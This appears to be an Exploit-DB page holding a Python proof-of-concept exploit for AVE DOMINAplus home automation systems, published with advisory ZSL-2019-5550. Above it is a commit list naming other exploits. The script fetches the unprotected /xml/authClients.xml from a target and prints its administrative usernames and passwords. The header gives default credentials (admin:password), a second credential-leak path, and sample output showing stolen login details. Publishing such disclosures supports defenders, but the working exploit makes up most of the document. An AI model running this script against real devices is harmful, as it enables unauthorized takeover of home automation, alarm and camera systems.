cd36764b57
28 changes to exploits/shellcodes OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit) Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit) Microsoft UPnP - Local Privilege Elevation (Metasploit) AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC) FTP Navigator 8.03 - Stack Overflow (SEH) Wing FTP Server 6.0.7 - Unquoted Service Path Domain Quester Pro 6.02 - Stack Overflow (SEH) FreeBSD-SA-19:02.fd - Privilege Escalation FreeBSD-SA-19:15.mqueuefs - Privilege Escalation HomeAutomation 3.3.2 - Persistent Cross-Site Scripting HomeAutomation 3.3.2 - Authentication Bypass HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin) HomeAutomation 3.3.2 - Remote Code Execution elearning-script 1.0 - Authentication Bypass XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin) Thrive Smart Home 1.1 - Authentication Bypass XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin) XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin) WEMS BEMS 21.3.1 - Undocumented Backdoor Account AVE DOMINAplus 1.10.x - Credential Disclosure AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm) AVE DOMINAplus 1.10.x - Authentication Bypass Heatmiser Netmonitor 3.03 - Hardcoded Credentials MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure RICOH SP 4510SF Printer - HTML Injection RICOH Web Image Monitor 1.09 - HTML Injection Heatmiser Netmonitor 3.03 - HTML Injection
115 lines
No EOL
4.1 KiB
Text
115 lines
No EOL
4.1 KiB
Text
# Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure
|
|
# Date: 2019-12-30
|
|
# Author: LiquidWorm
|
|
# Vendor: AVE S.p.A.
|
|
# Product web page: https://www.ave.it | https://www.domoticaplus.it
|
|
# Affected version: Web Server Code 53AB-WBS - 1.10.62
|
|
# Advisory ID: ZSL-2019-5550
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
|
|
|
|
#!/usr/bin/env python
|
|
#
|
|
#
|
|
# AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit
|
|
#
|
|
#
|
|
# Vendor: AVE S.p.A.
|
|
# Product web page: https://www.ave.it | https://www.domoticaplus.it
|
|
# Affected version: Web Server Code 53AB-WBS - 1.10.62
|
|
# Touch Screen Code TS01 - 1.0.65
|
|
# Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
|
|
# Touch Screen Code TS05 - 1.10.36
|
|
# Models: 53AB-WBS
|
|
# TS01
|
|
# TS03V
|
|
# TS04X-V
|
|
# TS05N-V
|
|
# App version: 1.10.77
|
|
# App version: 1.10.65
|
|
# App version: 1.10.64
|
|
# App version: 1.10.62
|
|
# App version: 1.10.60
|
|
# App version: 1.10.52
|
|
# App version: 1.10.52A
|
|
# App version: 1.10.49
|
|
# App version: 1.10.46
|
|
# App version: 1.10.45
|
|
# App version: 1.10.44
|
|
# App version: 1.10.35
|
|
# App version: 1.10.25
|
|
# App version: 1.10.22
|
|
# App version: 1.10.11
|
|
# App version: 1.8.4
|
|
# App version: TS1-1.0.65
|
|
# App version: TS1-1.0.62
|
|
# App version: TS1-1.0.44
|
|
# App version: TS1-1.0.10
|
|
# App version: TS1-1.0.9
|
|
#
|
|
# Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
|
|
# Designed to revolutionize your concept of living. DOMINA plus is the AVE home
|
|
# automation proposal that makes houses safer, more welcoming and optimized. In
|
|
# fact, our home automation system introduces cutting-edge technologies, designed
|
|
# to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
|
|
# and security and offers advanced supervision tools in order to learn how to evaluate
|
|
# and reduce consumption through various solutions dedicated to energy saving.
|
|
#
|
|
# Desc: The application suffers from clear-text credentials disclosure vulnerability
|
|
# that allows an unauthenticated attacker to issue a request to an unprotected directory
|
|
# that hosts an XML file '/xml/authClients.xml' and obtain administrative login information
|
|
# that allows for a successful authentication bypass attack.
|
|
#
|
|
# Default credentials: admin:password
|
|
# Configuration and camera credentials disclosure: /xml/tsconf.xml
|
|
#
|
|
# ==================================================
|
|
# root@kali:~/domina# ./poc.py http://192.168.1.10
|
|
#
|
|
# Ze microfilm:
|
|
# -------------
|
|
# Username: arnoldcontrol
|
|
# Password: P1sD0nt5pYMe
|
|
# ==================================================
|
|
#
|
|
# Tested on: GNU/Linux 4.1.19-armv7-x7
|
|
# GNU/Linux 3.8.13-bone50/bone71.1/bone86
|
|
# Apache/2.4.7 (Ubuntu)
|
|
# Apache/2.2.22 (Debian)
|
|
# PHP/5.5.9-1ubuntu4.23
|
|
# PHP/5.4.41-0+deb7u1
|
|
# PHP/5.4.36-0+deb7u3
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2019-5550
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
|
|
#
|
|
#
|
|
# 06.10.2019
|
|
#
|
|
|
|
import sys,re
|
|
import xml.etree.ElementTree as XML
|
|
|
|
from urllib2 import Request,urlopen
|
|
|
|
if (len(sys.argv) <= 1):
|
|
print '[*] Usage: poc.py http://ip:port'
|
|
exit(0)
|
|
|
|
host = sys.argv[1]
|
|
headers = {'Accept': 'application/xml'}
|
|
request = Request(host+'/xml/authClients.xml', headers=headers)
|
|
print '\nZe microfilm:'
|
|
print '-------------'
|
|
xml = urlopen(request).read()
|
|
tree = XML.fromstring(xml)
|
|
|
|
for user in tree.findall('customer'):
|
|
print 'Username: ',user.get('plantCode')
|
|
|
|
for pwd in tree.iter('password'):
|
|
print 'Password: '+pwd.text+'\n' |